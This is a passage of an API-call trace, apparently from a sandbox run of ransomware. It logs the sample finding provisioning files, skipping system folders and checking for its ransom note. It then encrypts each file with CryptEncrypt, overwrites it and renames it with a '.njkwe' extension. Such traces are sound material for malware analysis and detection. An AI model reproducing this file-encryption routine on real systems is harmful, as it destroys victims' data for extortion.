(lpFirst="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.102] lstrcmpW (lpString1="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.102] lstrcmpW (lpString1="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.102] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\564__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.102] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\564__connections_cellular_orange (tunisia)_i5$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.102] GetTickCount () returned 0x1154d51 [0082.102] GetTickCount () returned 0x1154d51 [0082.102] GetTickCount () returned 0x1154d51 [0082.102] GetTickCount () returned 0x1154d51 [0082.102] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.102] GetProcessHeap () returned 0xbe0000 [0082.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.102] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0082.104] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.104] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0082.104] GetProcessHeap () returned 0xbe0000 [0082.104] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.104] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.104] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.104] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.104] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.104] CloseHandle (hObject=0x444) returned 1 [0082.104] GetProcessHeap () returned 0xbe0000 [0082.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.104] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\564__connections_cellular_orange (tunisia)_i5$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\564__connections_cellular_orange (tunisia)_i5$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.105] GetProcessHeap () returned 0xbe0000 [0082.105] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.105] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914503e2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914503e2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914503e2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", cAlternateFileName="565__C~1.PRO")) returned 1 [0082.105] lstrcmpiW (lpString1="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.105] lstrcmpiW (lpString1="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.105] lstrcmpiW (lpString1="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.105] lstrcmpiW (lpString1="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.105] lstrcmpiW (lpString1="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.105] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml") returned 159 [0082.105] StrStrIW (lpFirst="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.105] lstrcmpW (lpString1="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.105] lstrcmpW (lpString1="565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.105] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\565__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.105] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\565__connections_cellular_orange (uganda)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.106] GetTickCount () returned 0x1154d51 [0082.106] GetTickCount () returned 0x1154d51 [0082.106] GetTickCount () returned 0x1154d51 [0082.106] GetTickCount () returned 0x1154d51 [0082.106] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.106] GetProcessHeap () returned 0xbe0000 [0082.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.106] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0082.141] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.141] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0082.142] GetProcessHeap () returned 0xbe0000 [0082.142] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.142] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.142] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.142] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.142] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.142] CloseHandle (hObject=0x444) returned 1 [0082.142] GetProcessHeap () returned 0xbe0000 [0082.142] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.142] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0082.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\565__connections_cellular_orange (uganda)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\565__Connections_Cellular_Orange (Uganda)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\565__connections_cellular_orange (uganda)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.143] GetProcessHeap () returned 0xbe0000 [0082.143] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.143] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914503e2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914503e2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914503e2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", cAlternateFileName="566__C~1.PRO")) returned 1 [0082.144] lstrcmpiW (lpString1="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.144] lstrcmpiW (lpString1="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.144] lstrcmpiW (lpString1="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.144] lstrcmpiW (lpString1="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.144] lstrcmpiW (lpString1="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.144] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml") returned 173 [0082.144] StrStrIW (lpFirst="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.144] lstrcmpW (lpString1="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.144] lstrcmpW (lpString1="566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.144] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\566__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.144] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\566__connections_cellular_cubic telecom (liechtenstein)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.144] GetTickCount () returned 0x1154d80 [0082.144] GetTickCount () returned 0x1154d80 [0082.144] GetTickCount () returned 0x1154d80 [0082.144] GetTickCount () returned 0x1154d80 [0082.145] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.145] GetProcessHeap () returned 0xbe0000 [0082.145] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.145] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x35a, lpOverlapped=0x0) returned 1 [0082.146] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffca6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.146] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x35a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x35a, lpOverlapped=0x0) returned 1 [0082.146] GetProcessHeap () returned 0xbe0000 [0082.146] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.146] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.146] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.146] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.147] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.147] CloseHandle (hObject=0x444) returned 1 [0082.147] GetProcessHeap () returned 0xbe0000 [0082.147] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.147] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 193 [0082.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\566__connections_cellular_cubic telecom (liechtenstein)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\566__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\566__connections_cellular_cubic telecom (liechtenstein)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.148] GetProcessHeap () returned 0xbe0000 [0082.148] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.148] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9147664e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9147664e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9147664e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", cAlternateFileName="567__C~1.PRO")) returned 1 [0082.148] lstrcmpiW (lpString1="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.148] lstrcmpiW (lpString1="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.148] lstrcmpiW (lpString1="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.148] lstrcmpiW (lpString1="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.148] lstrcmpiW (lpString1="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.148] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml") returned 173 [0082.148] StrStrIW (lpFirst="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.148] lstrcmpW (lpString1="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.148] lstrcmpW (lpString1="567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.148] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\567__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.148] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\567__connections_cellular_cubic telecom (liechtenstein)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.149] GetTickCount () returned 0x1154d80 [0082.149] GetTickCount () returned 0x1154d80 [0082.149] GetTickCount () returned 0x1154d80 [0082.149] GetTickCount () returned 0x1154d80 [0082.149] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.149] GetProcessHeap () returned 0xbe0000 [0082.149] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.149] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0082.151] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.151] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x34e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0082.151] GetProcessHeap () returned 0xbe0000 [0082.151] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.151] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.151] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.151] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.151] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.151] CloseHandle (hObject=0x444) returned 1 [0082.151] GetProcessHeap () returned 0xbe0000 [0082.151] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.151] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 193 [0082.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\567__connections_cellular_cubic telecom (liechtenstein)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\567__Connections_Cellular_Cubic Telecom (Liechtenstein)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\567__connections_cellular_cubic telecom (liechtenstein)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.152] GetProcessHeap () returned 0xbe0000 [0082.152] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.152] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, 